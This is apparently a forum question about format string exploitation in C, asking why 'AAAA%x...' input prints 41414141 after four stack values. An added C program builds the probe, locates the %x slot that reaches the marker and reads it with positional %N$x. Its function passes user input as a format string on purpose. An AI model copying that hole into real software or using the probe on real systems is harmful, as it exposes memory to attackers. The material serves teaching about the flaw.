I came across this code showing format string exploitation while reading [this] article.
```c
char secret[] = "hack.se is lame";
printf("secret = %p\n", &secret);
```
Executing it with the following input gives:

```text
secret = 0xbffffc68
AAAA%x %x %x %x %x %x %x        // input given
AAAA4013fe20 0 0 0 41414141 33313034 30326566
```
What I understand so far is that the sequence of `%x`s will keep printing the values at the addresses above the current `%esp` (I'm assuming that the stack grows downwards, towards lower addresses).
What I'm unable to understand is that the given input is stored in the `buffer` array, which can't be less than 512 bytes away from the current `%esp`. So how can the output contain `41414141` (the hex representation of `AAAA`) right after the 4 `%x`s, i.e. just above the 4 addresses from the current `%esp`? I tried hard to stare at the assembly code too, but I don't think I could follow the manipulation of strings on the stack.
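An added example, not code from the question or from the linked article: a small C program showing the usual way to work out empirically which `%x` reaches the marker bytes, and then to read that slot alone with a positional `%N$x` (a POSIX/glibc extension). The names `build_probe`, `find_marker_index` and `vuln` are chosen for this example. The vulnerable sink here is `snprintf` with the copied input as the format string, rather than `printf`, so that `main()` can capture and parse the result; the slot index depends on what the compiler places between the variadic argument area and the copy of the input, and on x86-64 the first five `%x` consume integer argument registers before anything is read from the stack, so the number found is specific to one build and one sink.

```c
/* Added example (not from the question or the linked article): locate the
 * %x slot that returns attacker-controlled bytes, then read it directly.
 * build_probe, find_marker_index and vuln are names chosen for this example. */
#include <stdio.h>
#include <string.h>

/* Build a probe like "AAAA%x %x %x": the marker followed by `count` %x. */
static int build_probe(char *out, size_t outsz, const char *marker, int count)
{
    int n = snprintf(out, outsz, "%s", marker);
    if (n < 0 || (size_t)n >= outsz)
        return -1;
    for (int i = 0; i < count; i++) {
        int m = snprintf(out + n, outsz - (size_t)n, "%s%%x", i ? " " : "");
        if (m < 0 || (size_t)m >= outsz - (size_t)n)
            return -1;
        n += m;
    }
    return n;                         /* length of the probe string */
}

/* Given the output of the probe, return the 1-based position of the %x
 * that printed the marker word, or -1 if the marker was not reached. */
static int find_marker_index(const char *output, const char *marker)
{
    size_t mlen = strlen(marker);
    if (mlen == 0 || strncmp(output, marker, mlen) != 0)
        return -1;                    /* the literal prefix is echoed first */

    /* %x shows the marker bytes as one host-order unsigned int, so
     * "AAAA" becomes 41414141 regardless of endianness. */
    unsigned int word = 0;
    memcpy(&word, marker, mlen < sizeof word ? mlen : sizeof word);
    char expect[2 * sizeof word + 1];
    snprintf(expect, sizeof expect, "%x", word);

    char buf[1024];
    snprintf(buf, sizeof buf, "%s", output + mlen);
    int idx = 0;
    for (char *tok = strtok(buf, " \n"); tok != NULL; tok = strtok(NULL, " \n")) {
        idx++;
        if (strcmp(tok, expect) == 0)
            return idx;
    }
    return -1;
}

/* Deliberately vulnerable: the copied input is used as the format string.
 * Rendering into `out` instead of calling printf lets main() parse the result. */
static void vuln(const char *input, char *out, size_t outsz)
{
    char buffer[512];
    snprintf(buffer, sizeof buffer, "%s", input);
    snprintf(out, outsz, buffer);     /* BUG: no format arguments supplied */
}

int main(void)
{
    char probe[512], out[2048];

    /* Enough %x to walk well past the copy of the input in vuln's frame. */
    if (build_probe(probe, sizeof probe, "AAAA", 80) < 0)
        return 1;
    vuln(probe, out, sizeof out);
    printf("probe : %s\noutput: %s\n", probe, out);

    int idx = find_marker_index(out, "AAAA");
    if (idx < 0) {
        printf("marker not reached; lengthen the probe\n");
        return 1;
    }
    printf("marker word is argument #%d\n", idx);

    /* Direct parameter access: "AAAA%<idx>$x" reads that one slot. */
    snprintf(probe, sizeof probe, "AAAA%%%d$x", idx);
    vuln(probe, out, sizeof out);
    printf("direct: %s -> %s\n", probe, out);
    return 0;
}
```

Fed the output line quoted in the question, `find_marker_index` returns 5, i.e. the marker word is the fifth value consumed, which is why `41414141` appears after four other values. With a 32-bit `printf` sink each `%x` advances 4 bytes up the stack; with the 64-bit SysV ABI each `%x` consumes an 8-byte slot and prints its low 32 bits, so the same source gives a different index there.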